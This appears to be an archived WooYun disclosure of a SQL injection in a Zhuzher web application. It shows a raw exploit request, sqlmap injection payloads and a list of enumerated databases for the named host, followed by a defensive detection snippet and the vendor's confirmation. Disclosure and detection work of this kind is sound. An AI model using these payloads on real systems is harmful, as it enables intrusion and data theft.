WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-12-23: Details sent to the vendor, awaiting vendor handling
2015-12-25: Vendor has confirmed; details disclosed to the vendor only
2016-01-04: Details disclosed to core white hats and experts in related fields
2016-01-14: Details disclosed to regular white hats
2016-01-24: Details disclosed to intern white hats
2016-02-08: Details disclosed to the public
2333
POST /dibeicrs/internalMsgInfoList.html HTTP/1.1
X-Forwarded-For: 8.8.8.8'
Content-Length: 151
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://cbs.zhuzher.com:15018/
Cookie: JSESSIONID=6A29C439CA0C6C84F19600D5D092E779; JSESSIONID=6A29C439CA0C6C84F19600D5D092E779; key=yourkey; guid=206e-314c-c081-f57b
Host: cbs.zhuzher.com:15018
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

acceptTime=4111111111111111*&button=%e6%90%9c%e7%b4%a2&content=-1&msgtype=0&page=1&sendTime=1&status=0
The acceptTime parameter is injectable.
DBA privileges
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 247 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: acceptTime=-7427') OR 4822=4822 AND ('ioer'='ioer&button=%e6%90%9c%e7%b4%a2&content=-1&msgtype=0&page=1&sendTime=1&status=0

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: acceptTime=4111111111111111') AND (SELECT * FROM (SELECT(SLEEP(5)))oHmr) AND ('LLSQ'='LLSQ&button=%e6%90%9c%e7%b4%a2&content=-1&msgtype=0&page=1&sendTime=1&status=0

    Type: UNION query
    Title: Generic UNION query (random number) - 8 columns
    Payload: acceptTime=4111111111111111') UNION ALL SELECT 4627,CONCAT(0x716a6b7071,0x72414e69426479574a4c,0x71706a6b71),4627,4627,4627,4627,4627,4627-- &button=%e6%90%9c%e7%b4%a2&content=-1&msgtype=0&page=1&sendTime=1&status=0
---
[18:01:35] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0.12
[18:01:35] [INFO] fetching database names
available databases [50]:
[*] baitiane
[*] baiyuan
[*] baolongjujia
[*] cbs20121022
[*] chenguang
[*] demo703
[*] dibei
[*] dongxiangting
[*] eken
[*] futai118
[*] fuyi
[*] geziwei
[*] haizhilian
[*] hanmu
[*] hanshe
[*] haorujia
[*] heyi
[*] hongzhen
[*] hongzhenpms
[*] hualv
[*] huilai
[*] hutongyin
[*] ims
[*] information_schema
[*] jiayuan
[*] jingtong
[*] jintaizhijia
[*] jitai
[*] kaibin
[*] mini
[*] mysql
[*] nixi
[*] nuoting
[*] nuotingnew
[*] qibai
[*] renhe
[*] sanyuan
[*] shishang
[*] tanggongguan
[*] test
[*] test_cbs
[*] vbs
[*] wuyishan
[*] xicheng
[*] xijinshuyuan
[*] yibai
[*] yidafengshang
[*] yinju
[*] yuanyang
[*] yueyou
[18:01:37] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\cbs.zhuzher.com'
[*] shutting down at 18:01:37
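As an added defender-side example (not part of the original WooYun report or the vendor's code), the Python below parses a POST body of the shape used above, applies an allowlist to acceptTime (assumed here to be a purely numeric value; the report does not state its format) and flags the three payload shapes sqlmap reported. The sample bodies are constructed to mirror those payloads and are not captured traffic.

```python
import re
from urllib.parse import parse_qs

# Assumption: a legitimate acceptTime is digits only (the report does not say).
ACCEPT_TIME_OK = re.compile(r"^\d{1,16}$")

# Signatures for the three injection types sqlmap reported against acceptTime.
SIGNATURES = {
    "boolean-based": re.compile(r"\bOR\b\s+(\d+)=\1\b", re.I),      # OR 4822=4822
    "time-based": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),      # SLEEP(5)
    "union": re.compile(r"\bUNION\b\s+(ALL\s+)?SELECT\b", re.I),    # UNION ALL SELECT
}

# Constructed sample bodies: one benign search, then one per payload shape.
SAMPLE_BODIES = [
    "acceptTime=20151223&button=%e6%90%9c%e7%b4%a2&content=-1&msgtype=0&page=1",
    "acceptTime=-7427%27)%20OR%204822%3D4822%20AND%20(%27ioer%27%3D%27ioer&page=1",
    "acceptTime=4111111111111111%27)%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))oHmr)"
    "%20AND%20(%27LLSQ%27%3D%27LLSQ&page=1",
    "acceptTime=4111111111111111%27)%20UNION%20ALL%20SELECT%204627,CONCAT(0x71,0x72,0x71),"
    "4627,4627,4627,4627,4627,4627--%20&page=1",
]


def classify(body: str) -> dict:
    """Decode the form body, allowlist-check acceptTime and match known payload shapes."""
    params = parse_qs(body, keep_blank_values=True)
    value = params.get("acceptTime", [""])[0]
    hits = [name for name, rx in SIGNATURES.items() if rx.search(value)]
    return {
        "value": value,
        "valid": bool(ACCEPT_TIME_OK.match(value)),  # allowlist alone rejects all three payloads
        "signatures": hits,
    }


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(classify(body))
```

The allowlist check is the fix a reviewer would ask for alongside a parameterised query; the signature matches are only useful as detection for traffic that already reached the server.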
Severity: Medium
Vulnerability Rank: 5
Confirmed at: 2015-12-25 20:24
Thanks to the white hat for paying attention to Zhuzher; we will fix this issue as soon as possible.
None yet